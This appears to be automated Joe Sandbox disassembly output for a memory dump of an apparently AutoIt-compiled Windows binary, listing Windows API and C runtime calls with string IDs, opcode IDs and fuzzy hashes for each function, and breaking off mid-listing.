                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00167595
                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0016759C
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001675B2
                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 001675B9
                                                                                                                                                          • _wprintf.LIBCMT ref: 001675DF
                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001675FD
                                                                                                                                                          Strings
                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 001675DA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32 ref: 00179B38
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179B45
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00179B6F
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179B9F
                                                                                                                                                          • htons.WS2_32(?), ref: 00179C51
                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 00179C0C
                                                                                                                                                            • Part of subcall function 0015E0F5: _strlen.LIBCMT ref: 0015E0FF
                                                                                                                                                            • Part of subcall function 0015E0F5: _memmove.LIBCMT ref: 0015E121
                                                                                                                                                          • _strlen.LIBCMT ref: 00179CA7
                                                                                                                                                          • _memmove.LIBCMT ref: 00179D10
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3637404534-0
                                                                                                                                                          APIs
                                                                                                                                                          • __mtinitlocknum.LIBCMT ref: 0014B744
                                                                                                                                                            • Part of subcall function 00148A0C: __FF_MSGBANNER.LIBCMT ref: 00148A21
                                                                                                                                                            • Part of subcall function 00148A0C: __NMSG_WRITE.LIBCMT ref: 00148A28
                                                                                                                                                            • Part of subcall function 00148A0C: __malloc_crt.LIBCMT ref: 00148A48
                                                                                                                                                          • __lock.LIBCMT ref: 0014B757
                                                                                                                                                          • __lock.LIBCMT ref: 0014B7A3
                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001D6948,00000018,00156C2B,?,00000000,00000109), ref: 0014B7BF
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0014B7DC
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0014B7EC
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1422805418-0
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0016A1CE
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0016A205
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0016A221
                                                                                                                                                          • _memmove.LIBCMT ref: 0016A26F
                                                                                                                                                          • _memmove.LIBCMT ref: 0016A28C
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0016A29B
                                                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0016A2B0
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0016A2CF
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 256516436-0
                                                                                                                                                          APIs
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00188CF3
                                                                                                                                                          • GetDC.USER32(00000000), ref: 00188CFB
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00188D06
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00188D12
                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00188D4E
                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00188D5F
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00188D99
                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00188DB9
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0016C6A0: __time64.LIBCMT ref: 0016C6AA
                                                                                                                                                            • Part of subcall function 001241A7: _fseek.LIBCMT ref: 001241BF
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0016C96F
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0016C982
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C995
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0016C9BA
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C9D0
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C9E3
                                                                                                                                                            • Part of subcall function 0016C6E4: _memmove.LIBCMT ref: 0016C71D
                                                                                                                                                            • Part of subcall function 0016C6E4: _memmove.LIBCMT ref: 0016C72C
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016C92A
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1017551523-0
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018214B
                                                                                                                                                          • _memset.LIBCMT ref: 00182214
                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00182259
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00182320
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0018232F
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 4082843840-2766056989
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32(?), ref: 0016481D
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00164832
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00164893
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 001648C1
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 001648E0
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00164926
                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00164949
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32(00000000), ref: 00164638
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0016464D
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 001646AE
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001646DA
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001646F7
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0016473B
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0016475C
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                          APIs
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcsncpy$LocalTime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2945705084-0
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00189DB0
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189E57
                                                                                                                                                          • IsMenu.USER32(?), ref: 00189E6F
                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189EB7
                                                                                                                                                          • DrawMenuBar.USER32 ref: 00189ED0
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3866635326-4108050209
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00188DF4
                                                                                                                                                          • GetWindowLongW.USER32(01735D98,000000F0), ref: 00188E27
                                                                                                                                                          • GetWindowLongW.USER32(01735D98,000000F0), ref: 00188E5C
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00188E8E
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00188EB8
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00188EC9
                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00188EE3
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00161734
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0016175A
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0016175D
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0016177B
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00161784
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 001617A9
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 001617B7
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                                                                          • Opcode ID: 771dccf20acdfb82dc3f2da410fb83c6d9a3e891de5b5ff7daf0a2d3eace7a29
                                                                                                                                                          • Instruction ID: 6ed794a08439d52e28645b751225c8a8f5780e52949e1a021e3622da9e7eee36
                                                                                                                                                          • Opcode Fuzzy Hash: 771dccf20acdfb82dc3f2da410fb83c6d9a3e891de5b5ff7daf0a2d3eace7a29
                                                                                                                                                          • Instruction Fuzzy Hash: 7221383220462176D235A634AC06FBBB3E8DF69310F544029F99587191EBB19AA6C395
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0016180D
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00161833
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00161836
                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00161857
                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00161860
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 0016187A
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00161888
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                           • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                          • Opcode ID: 5011309f29e7e7e84057f58b3831900370f95025b72099dd5253134ac57a60cf
                                                                                                                                                          • Instruction ID: f243cb0a39607b7e815f0251f5f29f167f16410ab782462cf8224b9d98278f94
                                                                                                                                                          • Opcode Fuzzy Hash: 5011309f29e7e7e84057f58b3831900370f95025b72099dd5253134ac57a60cf
                                                                                                                                                          • Instruction Fuzzy Hash: 75217175600204BF9B109BA9DC88DBA77ECEB0E3607448525F915DB6A0DB74EC818B60
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0018A13B
                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0018A148
                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0018A153
                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0018A162
                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0018A16E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                          • Opcode ID: 5066e946edf0b61954a783c713e19b6e91a3919ef50a947437906f567f42f79e
                                                                                                                                                          • Instruction ID: 5101f935b8b02638850b5fd69daf1e91863d199635feb6e5184fae79f29faa0c
                                                                                                                                                          • Opcode Fuzzy Hash: 5066e946edf0b61954a783c713e19b6e91a3919ef50a947437906f567f42f79e
                                                                                                                                                          • Instruction Fuzzy Hash: F51190B1140219BFEF159F60CC86EEB7F5DEF08798F014215FA08A6090C7729C21DBA0
                                                                                                                                                          APIs
                                                                                                                                                          • __getptd_noexit.LIBCMT ref: 00144C3E
                                                                                                                                                            • Part of subcall function 001486B5: GetLastError.KERNEL32(?,00140127,001488A3,00144673,?,?,00140127,?,0012125D,00000058,?,?), ref: 001486B7
                                                                                                                                                            • Part of subcall function 001486B5: __calloc_crt.LIBCMT ref: 001486D8
                                                                                                                                                            • Part of subcall function 001486B5: GetCurrentThreadId.KERNEL32 ref: 00148701
                                                                                                                                                            • Part of subcall function 001486B5: SetLastError.KERNEL32(00000000,00140127,001488A3,00144673,?,?,00140127,?,0012125D,00000058,?,?), ref: 00148719
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00144C1D), ref: 00144C52
                                                                                                                                                          • __freeptd.LIBCMT ref: 00144C59
                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000,?,00144C1D), ref: 00144C61
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00144C1D), ref: 00144C91
                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000,?,?,00144C1D), ref: 00144C98
                                                                                                                                                          • __freefls@4.LIBCMT ref: 00144CB4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1445074172-0
                                                                                                                                                          • Opcode ID: e03eb5d89623dd948da377c4a4d997cf80294d5548a3456b71c58afebcee1287
                                                                                                                                                          • Instruction ID: 1f5e308a78aee7ba3fc5b3baa638a81147543186b518c15ead723f1eb26fb910
                                                                                                                                                          • Opcode Fuzzy Hash: e03eb5d89623dd948da377c4a4d997cf80294d5548a3456b71c58afebcee1287
                                                                                                                                                          • Instruction Fuzzy Hash: 650126B4401B01AFCB19BB74E949A0E7BE5FF253157148518F809CBA72EF34D8828B91
                                                                                                                                                          APIs
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013C6C0
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013C701
                                                                                                                                                          • ScreenToClient.USER32(?,000000FF), ref: 0013C729
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013C856
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013C86F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                          • Opcode ID: 602310f5b812775dffc735196e8db4ac0d79262d9d91e2e282ee6f50c34b0924
                                                                                                                                                          • Instruction ID: d19679f94fc05081dd55a94453841e083ca304283c3ebba6a7ac5471bd460768
                                                                                                                                                          • Opcode Fuzzy Hash: 602310f5b812775dffc735196e8db4ac0d79262d9d91e2e282ee6f50c34b0924
                                                                                                                                                          • Instruction Fuzzy Hash: 24B16B7990024ADBDF14CFA8C5807EDB7B1FF08310F15956AEC59EB654EB30AA40CBA4
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3253778849-0
                                                                                                                                                          • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                          • Instruction ID: 174d09312c84b5bd04507a639a6014aea54998aaebf2c9ccd14837b4639c9867
                                                                                                                                                          • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                          • Instruction Fuzzy Hash: 5061D23050025A9FDF05EF60CC91EFE77A9AF24308F044559F95A6B2A2EB34DD25CB51
                                                                                                                                                          APIs
                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00181B09
                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00181B17
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00181B45
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscat.LIBCMT ref: 00181B5A
                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00181BD0
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00181BE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1380811348-0
                                                                                                                                                          • Opcode ID: fdb67e38f7fb0f9ef010cc1ce86bf55f88b5dbf4425336748cdd5c3dbe22f241
                                                                                                                                                          • Instruction ID: b78d63bf0011ceb09c6cb81f65410b00bb5ce4b3e4128db461fc9213e16321b1
                                                                                                                                                          • Opcode Fuzzy Hash: fdb67e38f7fb0f9ef010cc1ce86bf55f88b5dbf4425336748cdd5c3dbe22f241
                                                                                                                                                          • Instruction Fuzzy Hash: 74518072504310AFD710EF24D885EABB7ECEF98754F00491EF58697251EB30EA45CB92
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2037614760-0
                                                                                                                                                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                          • Instruction ID: d6d601282f81edaf29b8e98f99742317a7d7eaa3c60d6d0ae4243b18e20d4236
                                                                                                                                                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                          • Instruction Fuzzy Hash: 70511030914225AECF25AF98F4419BDB7B1FF14311F50904EF581AB292DBB49F82D791
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00162AF6
                                                                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 00162B68
                                                                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00162BC3
                                                                                                                                                          • _memmove.LIBCMT ref: 00162BED
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00162C3A
                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00162C68
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1101466143-0
                                                                                                                                                          • Opcode ID: 43e09b0672403de8dd8f5db0459929b039bd13ac5a4925767a007e510e3a9f0a
                                                                                                                                                          • Instruction ID: 1e502268ef26f0483bfab825f32c14c290fe67054fd83c5924c58585edfc0d7e
                                                                                                                                                          • Opcode Fuzzy Hash: 43e09b0672403de8dd8f5db0459929b039bd13ac5a4925767a007e510e3a9f0a
                                                                                                                                                          • Instruction Fuzzy Hash: 945178B5A00609EFDB24CF58C880EAAB7B8FF4C314B158559E959DB310E730EA51CFA0
                                                                                                                                                          APIs
                                                                                                                                                          • GetMenu.USER32(?), ref: 0018833D
                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00188374
                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0018839C
                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0018840B
                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00188419
                                                                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0018846A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 650687236-0
                                                                                                                                                          • Opcode ID: 2d45915b9b7771940b084d9f167e8af710bd7173b7c3a952468797e81d47e778
                                                                                                                                                          • Instruction ID: eab400d41e3db98ed6802e7188c9480d53fc5077ad97c3b3405d55fe8ee47f86
                                                                                                                                                          • Opcode Fuzzy Hash: 2d45915b9b7771940b084d9f167e8af710bd7173b7c3a952468797e81d47e778
                                                                                                                                                          • Instruction Fuzzy Hash: D3517B76A00625EFCB01EFA8D841AAEB7B4FF58710F118459E916BB351DB30AE418F90
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00179409
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179416
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0017943A
                                                                                                                                                          • _strlen.LIBCMT ref: 00179484
                                                                                                                                                          • _memmove.LIBCMT ref: 001794CA
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001794F7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2795762555-0
                                                                                                                                                          • Opcode ID: 4baad2bcc5e1c778c696de8f0e218ab366b15e9450f6dd86b48901e8d0c58754
                                                                                                                                                          • Instruction ID: ea6588463c1e84135d072416179cf7fe3e8c168264f5d589b245c0ad22d74eb1
                                                                                                                                                          • Opcode Fuzzy Hash: 4baad2bcc5e1c778c696de8f0e218ab366b15e9450f6dd86b48901e8d0c58754
                                                                                                                                                          • Instruction Fuzzy Hash: CD419175600108AFCB18EBA4DD85EAEB7B9EF58314F108169F51A972D1EB30AE45CB60
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0016552E
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00165579
                                                                                                                                                          • IsMenu.USER32(00000000), ref: 00165599
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001655CD
                                                                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 0016562B
                                                                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0016565C
                                                                                                                                                          Memory Dump Source
